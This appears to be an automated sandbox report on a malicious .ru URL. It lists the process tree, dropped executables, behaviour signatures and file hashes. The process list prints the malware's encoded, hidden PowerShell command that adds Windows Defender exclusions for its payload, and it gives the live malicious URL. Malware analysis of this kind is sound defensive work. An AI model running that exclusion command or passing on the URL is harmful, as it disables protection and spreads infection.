Analysis
-
max time kernel
70s -
max time network
75s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system -
submitted
26/03/2025, 19:01
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://awndsjkduiukekwltdadjwadawds.ru/awidsmdjnfsd
Resource
win11-20250313-en
General
-
Target
http://awndsjkduiukekwltdadjwadawds.ru/awidsmdjnfsd
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 14284 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2056 Unshbct.exe 8548 AsyncWaitHandle.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 8548 set thread context of 10000 8548 AsyncWaitHandle.exe 114 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp msedge.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unshbct.exe:Zone.Identifier msedge.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133874892947569894" msedge.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-167299615-4170584903-1843289874-1000\{31A78B26-DADC-42B0-80F9-52A26A259B9A} msedge.exe Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\MuiCache BackgroundTransferHost.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\FilterLevel\AsyncWaitHandle.exe\:Zone.Identifier:$DATA Unshbct.exe File opened for modification C:\Users\Admin\Downloads\Unshbct.exe:Zone.Identifier msedge.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 14284 powershell.exe 14284 powershell.exe 14284 powershell.exe 8548 AsyncWaitHandle.exe 8548 AsyncWaitHandle.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2056 Unshbct.exe Token: SeDebugPrivilege 14284 powershell.exe Token: SeDebugPrivilege 8548 AsyncWaitHandle.exe Token: SeDebugPrivilege 10000 MSBuild.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe 5892 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 14108 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5892 wrote to memory of 2476 5892 msedge.exe 78 PID 5892 wrote to memory of 2476 5892 msedge.exe 78 PID 5892 wrote to memory of 5236 5892 msedge.exe 79 PID 5892 wrote to memory of 5236 5892 msedge.exe 79 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 5040 5892 msedge.exe 80 PID 5892 wrote to memory of 2136 5892 msedge.exe 82 PID 5892 wrote to memory of 2136 5892 msedge.exe 82 PID 5892 wrote to memory of 2136 5892 msedge.exe 82 PID 5892 wrote to memory of 2136 5892 msedge.exe 82 PID 5892 wrote to memory of 2136 5892 msedge.exe 82 PID 5892 wrote to memory of 2136 5892 msedge.exe 82 PID 5892 wrote to memory of 2136 5892 msedge.exe 82 PID 5892 wrote to memory of 2136 5892 msedge.exe 82 PID 5892 wrote to memory of 2136 5892 msedge.exe 82 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://awndsjkduiukekwltdadjwadawds.ru/awidsmdjnfsd1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5892 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x2ac,0x7ff991d7f208,0x7ff991d7f214,0x7ff991d7f2202⤵PID:2476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1848,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:112⤵PID:5236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2176,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:22⤵PID:5040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2308,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=2556 /prefetch:132⤵PID:2136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3404,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=3472 /prefetch:12⤵PID:3300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3412,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=3476 /prefetch:12⤵PID:5708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4832,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=4860 /prefetch:12⤵PID:2436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4732,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=4980 /prefetch:142⤵PID:4800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4760,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=4788 /prefetch:142⤵PID:1788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5232,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=5260 /prefetch:142⤵PID:5328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5404,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=5732 /prefetch:142⤵PID:572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5680,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=5768 /prefetch:12⤵PID:3760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5708,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=5776 /prefetch:142⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:2412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6464,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=6416 /prefetch:142⤵PID:4236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6464,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=6416 /prefetch:142⤵PID:5220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6556,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=5376 /prefetch:142⤵PID:3676
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.execookie_exporter.exe --cookie-json=11283⤵PID:3636
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5928,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:142⤵PID:13888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6572,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:142⤵PID:13896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6564,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=5772 /prefetch:142⤵PID:13904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5752,i,13950343481453535435,3930067161701400857,262144 --variations-seed-version --mojo-platform-channel-handle=3912 /prefetch:142⤵PID:5380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:1344
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4104
-
C:\Users\Admin\Downloads\Unshbct.exe"C:\Users\Admin\Downloads\Unshbct.exe"1⤵
- Executes dropped EXE
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:14108
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARgBpAGwAdABlAHIATABlAHYAZQBsAFwAQQBzAHkAbgBjAFcAYQBpAHQASABhAG4AZABsAGUALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABGAGkAbAB0AGUAcgBMAGUAdgBlAGwAXABBAHMAeQBuAGMAVwBhAGkAdABIAGEAbgBkAGwAZQAuAGUAeABlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:14284
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:7472
-
C:\Users\Admin\AppData\Roaming\FilterLevel\AsyncWaitHandle.exeC:\Users\Admin\AppData\Roaming\FilterLevel\AsyncWaitHandle.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8548 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:10000
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
280B
MD5e5f3655796637b7d0f4a8ed402e119ea
SHA13baaf516676664d46727759914745776a166016a
SHA25622d91a4321390a9445110f04d5600f49f03604a2d7ecadd10c663248295c88dd
SHA5122125899d678c926c9f85ad81892f8ee91aa0a74e4c533bcb6e48675ebf0eccbe0db17998f3e3ab961cf3beb8fef7f950588398c5868327aa2d33f81bde797ebe
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
107KB
MD540e2018187b61af5be8caf035fb72882
SHA172a0b7bcb454b6b727bf90da35879b3e9a70621e
SHA256b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5
SHA512a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12
-
Filesize
2KB
MD561390b22f25807959863fb60f453d8f4
SHA1e49e361cd8ccd79066ac04a0b84c67c72ef2609c
SHA256dbb6aafd2c036df1f7256f20f1c647e76151643b48e6a925cf8f4de0e7668aa4
SHA512f15d0803e59f3ab2bf2b8f35c709c27c188991f349897e136364bb297b1d4eb4efb84cb8a25fb3dfebbc6f7af92289805e5d8c46067164be028c1ee6bbd1652d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
Filesize
16KB
MD5cbb63e0aae6c509e2c7ba9f83b784db0
SHA164d1c6a10dc52f617fb794560ec4a5e550657589
SHA256f885fa23efe52b88e2c2a4b63417531f2a93d596da8fe6d18b05c6bad8c19298
SHA5120adb5ba1122b9f7effdf4a51e9c3a42273d5e780972f0177abf258e480b9e77c42fa82daaef92b06248157c6e76b839632b19f4e3d61477c1ebc8c5615bfc9eb
-
Filesize
16KB
MD5e40660c343428bb39a411890210dae80
SHA1c2dc5680cb61a24a3266ff13d22ead6a3698c81c
SHA2562018771c45cc71269ac22599570d3d78aeabc5fbdf2a7035c6582d4190796f2f
SHA5122d29e2be5006ffb6dada7a63bd1fea8c7f1f4b39c5a15345bfe61521639ba6eef56a06c5ba0fb9e327d377f64607ab9fbcf4164848c494873311be9fa5fc8b9a
-
Filesize
37KB
MD5bab56d81911f9c9361b738f9751301bb
SHA17ee69e6ccb3f5aa2d61ff774b1c50b28f56f6bfc
SHA256faf0b77298b2c5ed527bfb565e093d961426ee58d9a051521c1038fce3c067e9
SHA512dda7b7711813956396c7872688ef879d913badfa2b2a02e59a7ae99cc58620917d54f5bc32e0fdb083063894be19a4503673ab482ed11a90f9b035ca084c9b75
-
Filesize
22KB
MD50e46106dc42cdbac776cd42008ec6a8f
SHA19443c023664c65e3737b5f616f91dfc561b80012
SHA256e6eeeb7cbdf9c449b35c0e9c5bb87236c4c49114229540a6f0721137910e0ec7
SHA512e531f76ea17923c7a8411a68ced70b4e2948c0c914d5eaa4521290769fd2c82153465d9c95d1a41668bc76bcb3a31d5e5f3140fc61c1e5b43db589a61c4dc265
-
Filesize
467B
MD515a8b8f754d21c89d5272e5ecd8cc377
SHA1b91d55c05d6f3371f47a8129f046a05677fee890
SHA25630e715580a286bfc23830b7284bf580a7ad7530202571f7ebf53e6cd9f00063b
SHA5122c7160d37acd5aa61de36a3ef8cdd9ddeb346dfc2f3bf3ea8ae925c4a0ddee1c26580f8bdef14070b09ef18ac934066ade3672e41fe1b50d28c98c0624bf80e3
-
Filesize
23KB
MD5e895698d2fd3c5c29de61333597881bb
SHA19e368331fef38cff4abc5147731e7243d9b35399
SHA256ae513c1665a5f0ba18d838077f6c15c7a008681e5018c3f3fbbbc174afd6be00
SHA51297a4f9e765ec30f872ff8178e3153774a61d042556b950c26a2782cad49e6d3978225620047c7a67c8214cbb32b18777d3cf74e04c4461bac2d279790c053af8
-
Filesize
900B
MD50cbcf489ea85b2e02e568483df51c483
SHA1ceb8fd30d3ea2b2d4812ce9c9ff389cf1deb73de
SHA256ac60dc403a25d903a545ba31e226c47dd865996e3ab22181c4ed4519f44dc04d
SHA5124e8da943220b81be6a8c7e6413e2d9b5f5ba90d731e0eafa206f93500507be837601c04d03c743b764e14fd173b4ff68973c805b84b5c76a36fcdb985189343c
-
Filesize
19KB
MD541c1930548d8b99ff1dbb64ba7fecb3d
SHA1d8acfeaf7c74e2b289be37687f886f50c01d4f2f
SHA25616cee17a989167242dd7ee2755721e357dd23bcfcb61f5789cc19deafe7ca502
SHA512a684d61324c71ac15f3a907788ab2150f61e7e2b2bf13ca08c14e9822b22336d0d45d9ff2a2a145aa7321d28d6b71408f9515131f8a1bd9f4927b105e6471b75
-
Filesize
50KB
MD5aae64bd086885570e11c68705fed4dd1
SHA1de10a26444a0a00781deb45790e1cd56141f6135
SHA256605009e9fe0ad54de7c5a1522c76a0f78a06ce1f36eb1cf37d0e5aefb41b8b2e
